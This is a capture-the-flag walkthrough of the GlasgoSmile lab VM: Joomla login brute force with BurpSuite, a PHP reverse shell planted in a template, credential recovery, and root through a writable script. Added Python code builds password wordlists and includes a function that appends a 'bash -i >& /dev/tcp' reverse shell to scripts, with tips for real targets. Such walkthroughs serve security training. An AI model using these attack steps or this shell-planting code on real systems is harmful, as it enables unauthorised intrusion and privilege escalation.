GlasgoSmile Walkthrough

We scan the target with nmap -A -T4 -p- 192.168.1.17 -vv:

Port 80 is open, so we scan it with dirb http://192.168.1.17 /usr/share/dirb/wordlists/big.txt:

It's running Joomla, and dirb finds a page with the Joker photo, the welcome page, and the login page for the Joomla administrator panel:

192.168.1.17/

http://192.168.1.17/joomla/index.php

http://192.168.1.17/joomla/administrator/index.php

We are interested in the administrator page. We're going to start BurpSuite and try to log in, but first let's make a password list from the names that appear on the index.php page:

We start BurpSuite, enter the username Joomla and any password such as 123456 on the login page, let BurpSuite intercept the login request and send it to the Intruder tab:

In Intruder we mark only the password value 123456 as the payload position, load the list of names we made, and start the attack:

We get the password “Gotham” and log in to the Joomla panel:
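The list-building step above is the part that makes the Intruder attack work, so here is an added example (my code, not the walkthrough author's) of harvesting capitalised names from a page's visible text and mangling them into login candidates. The HTML below is a constructed sample, not the real index.php, and the suffixes in mangle() are assumptions about what a simple password policy produces.

```python
# Added example: build a candidate-password list from the names on a web page,
# the way the walkthrough builds one from index.php, then mangle the names into
# the variants an Intruder run would want to try.
import re
from html.parser import HTMLParser

# Constructed sample page; the real index.php content is not reproduced here.
SAMPLE_HTML = """<html><head><title>Welcome to Gotham</title>
<style>.x{color:red}</style><script>var Ignored = 1;</script></head>
<body><h1>Why so serious?</h1>
<p>The Joker and Harley Quinn run wild in Gotham while Batman watches.</p>
<img src="joker.jpg" alt="Joker">
</body></html>"""


class _TextExtractor(HTMLParser):
    """Collect visible text, skipping <script> and <style> bodies."""

    def __init__(self):
        super().__init__()
        self.parts = []
        self._skip = 0

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1
        # alt/title attributes often carry names that never appear as text
        for name, value in attrs:
            if name in ("alt", "title") and value:
                self.parts.append(value)

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        if not self._skip:
            self.parts.append(data)


def visible_text(html):
    parser = _TextExtractor()
    parser.feed(html)
    return " ".join(parser.parts)


def candidate_names(html, min_len=4):
    """Capitalised words of at least min_len letters, deduplicated, order kept."""
    words = re.findall(r"\b[A-Z][a-z]{%d,}\b" % (min_len - 1), visible_text(html))
    seen = []
    for word in words:
        if word not in seen:
            seen.append(word)
    return seen


def mangle(word):
    """Case and suffix variants (assumed policy: digits or '!' appended)."""
    out = []
    for base in (word, word.lower(), word.upper()):
        out.extend([base, base + "1", base + "123", base + "!", base + "2020"])
    return out


def build_wordlist(html):
    """Flat, deduplicated list ready to paste into Intruder as a payload set."""
    out = []
    for name in candidate_names(html):
        for variant in mangle(name):
            if variant not in out:
                out.append(variant)
    return out


if __name__ == "__main__":
    for password in build_wordlist(SAMPLE_HTML):
        print(password)
```

Run it against a saved copy of the page (curl the URL into a file and feed the contents to build_wordlist) and redirect the output to a file that Intruder loads as its simple list payload; the plain name “Gotham” sits in the list exactly as the author found it.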

Now we need to upload a reverse shell. Head to the Extensions tab and choose Templates:

From Templates choose Beez3:

In the files of the Beez3 template open index.php, clear its contents and paste in the reverse shell code (a PHP reverse shell pointing at your IP and port):

Have a listener ready on the chosen port (4444 in my case), click “Template Preview”, and the template executes and sends a reverse shell back to your machine:

After looking around I found that the host runs MySQL, and the Joomla configuration file /var/www/html/joomla/configuration.php contains the database name and the database password:

So we connect to the database with mysql -u joomla -p babyjoker (note that mysql takes a word after a space following -p as the database name, not the password; the password is typed at the prompt, or given as -p followed directly by the password with no space):

Next, we list the databases and tables:

The password for rob is stored base64-encoded; decoded it is ???AllIHaveAreNegativeThoughts???. Now we log in as rob:

And the first flag, user.txt, as rob:

We can also log in as rob via SSH, which is easier to work with:

In rob's home directory there is a file named Abnerineedyourhelp that looks like this:

I spent a lot of time on it and finally remembered that I had solved another challenge (chanakya) with the same kind of gibberish letters: it is a letter-rotation cipher of the ROT13/Caesar family. I found a GitHub page with a decoder for it; just set the shift to 1 instead of 13:

Now we have words we can read. The last line is base64, and decoding it gives the password for the next user, Abner:

The password is I33hope99my0death000makes44more8cents00than0my0life0
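Rather than guessing the shift in a web decoder, the two decoding steps above (undo a letter rotation, then base64-decode the last line) can be done in one script. The following is an added example of mine, not code from the walkthrough; the note it works on is a constructed sample (plaintext shifted by one letter, last line base64 of a made-up password), not the real Abnerineedyourhelp file, and the word list used for scoring is an assumption about what readable English looks like.

```python
# Added example: brute-force the shift of a letter-rotation (Caesar) note and
# base64-decode its last line, mirroring the two manual steps in the walkthrough.
import base64
import string

# Constructed sample note: English shifted by +1 (A -> B, a -> b), with the
# final line being base64 that was shifted along with everything else.
SAMPLE_NOTE = """Bcofs, uif qbttxpse gps zpvs bddpvou jt po uif mbtu mjof.
Ju jt uif tbnf gps fwfsz vtfs.
S290bHGu"""

# Assumed scoring vocabulary: the correct shift is the one that produces the
# most of these common English words.
COMMON_WORDS = {"the", "is", "for", "your", "it", "on", "last", "line",
                "password", "and", "same", "every", "user", "account"}


def rot(text, k):
    """Shift A-Z and a-z by k positions (0-25); other characters are untouched."""
    up, lo = string.ascii_uppercase, string.ascii_lowercase
    table = str.maketrans(up + lo, up[k:] + up[:k] + lo[k:] + lo[:k])
    return text.translate(table)


def score(text):
    """Count common English words in the candidate plaintext."""
    words = [w.strip(".,!?:;") for w in text.lower().split()]
    return sum(1 for w in words if w in COMMON_WORDS)


def crack_rot(ciphertext):
    """Try all 26 shifts and return (shift, plaintext) for the best-scoring one.

    A note encoded with shift +1 decodes with shift 25 (i.e. -1 mod 26).
    """
    best = max(range(26), key=lambda k: score(rot(ciphertext, k)))
    return best, rot(ciphertext, best)


def decode_last_line(text):
    """Base64-decode the final line; validate=True rejects non-base64 junk."""
    last = text.strip().splitlines()[-1].strip()
    return base64.b64decode(last, validate=True).decode()


def recover_password(note):
    """Full pipeline: undo the rotation, then decode the last line."""
    shift, plaintext = crack_rot(note)
    return shift, decode_last_line(plaintext)


if __name__ == "__main__":
    shift, plaintext = crack_rot(SAMPLE_NOTE)
    print("shift %d:\n%s" % (shift, plaintext))
    print("password:", decode_last_line(plaintext))
```

If the base64 line in a real note was not rotated along with the rest, call decode_last_line on the ciphertext instead of the recovered plaintext; the validate=True flag will raise on whichever of the two is not valid base64.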

The user2.txt flag for Abner:

I found something interesting in the .bash_history file:

Then I used find / -type f -name ".*" to look for hidden files and found it:

Now we go to that directory, copy the file back to Abner's home directory and unzip it:

And we get the password scf4W7q4B4caTMRhSFYmktMsn87F35UkmKttM5Bz. Now we log in as penguin:

The file .trash_old is our way to root. Viewing it shows a bash script; check first that penguin can write to it, then put our reverse shell into it, save it, and wait for the script to run and the shell to come back:
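The hidden-file hunt and the .trash_old edit are the two checks a practitioner repeats on every box, so here is an added example of mine (not the walkthrough's code) that does both: walk a tree for hidden regular files while pruning pseudo-filesystems and the usual dotfile noise, then, before touching a candidate script, confirm it is a writable script and append a bash reverse-shell line. The directory tree it runs on is constructed in a temp directory, and the attacker address 192.168.1.5 and port 4444 are assumptions for the demonstration.

```python
# Added example: find hidden files the way `find / -type f -name ".*"` does,
# but with noise pruned, then plant a reverse shell in a writable script such
# as .trash_old only after checking that we can actually write to it.
import os
import tempfile

# Dotfiles that show up in every home directory and are rarely the target.
NOISE = {".bash_history", ".bashrc", ".profile", ".bash_logout", ".viminfo"}


def hidden_files(root, skip_dirs=("proc", "sys", "dev", "run")):
    """Hidden regular files under root, skipping pseudo-filesystems at the top level."""
    found = []
    for dirpath, dirnames, filenames in os.walk(root):
        if dirpath == root:
            dirnames[:] = [d for d in dirnames if d not in skip_dirs]
        for name in filenames:
            if name.startswith(".") and name not in NOISE:
                found.append(os.path.join(dirpath, name))
    return sorted(found)


def writable_script(path):
    """True when path is a regular file we can write to that starts with a shebang."""
    if not os.path.isfile(path) or not os.access(path, os.W_OK):
        return False
    with open(path, "rb") as f:
        return f.read(2) == b"#!"


def owned_by_root(path):
    """A writable script owned by root is the interesting case for privesc."""
    return os.stat(path).st_uid == 0


def plant_reverse_shell(path, lhost, lport):
    """Append a bash reverse shell so the script keeps its original behaviour."""
    if not writable_script(path):
        raise PermissionError("%s is not a writable script" % path)
    payload = "bash -i >& /dev/tcp/%s/%d 0>&1\n" % (lhost, lport)
    with open(path, "a") as f:
        f.write(payload)
    return payload.rstrip("\n")


def make_demo_tree():
    """Constructed sample tree: noise dotfile, hidden script, plain file, /proc noise."""
    root = tempfile.mkdtemp(prefix="hidden_demo_")
    home = os.path.join(root, "home", "penguin")
    os.makedirs(home)
    os.makedirs(os.path.join(root, "proc", "1"))
    with open(os.path.join(home, ".bash_history"), "w") as f:
        f.write("ls\n")
    script = os.path.join(home, ".trash_old")
    with open(script, "w") as f:
        f.write("#!/bin/bash\nrm -rf /tmp/trash/*\n")
    with open(os.path.join(home, "notes.txt"), "w") as f:
        f.write("nothing here\n")
    with open(os.path.join(root, "proc", "1", ".noise"), "w") as f:
        f.write("x")
    return root, script


def demo():
    """Run both checks over the constructed tree and return what they produced."""
    root, script = make_demo_tree()
    found = hidden_files(root)
    planted = plant_reverse_shell(script, "192.168.1.5", 4444)
    with open(script) as f:
        tail = f.read().splitlines()[-1]
    return {
        "hidden": [os.path.relpath(p, root) for p in found],
        "writable": writable_script(script),
        "planted": planted,
        "tail": tail,
    }


if __name__ == "__main__":
    result = demo()
    print("hidden files:", result["hidden"])
    print("last line of script:", result["tail"])
```

On a real target call hidden_files("/") and check each candidate with writable_script and owned_by_root before editing anything; a root-owned script that an unprivileged user can write to, and that something runs on a schedule, is exactly the .trash_old situation.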
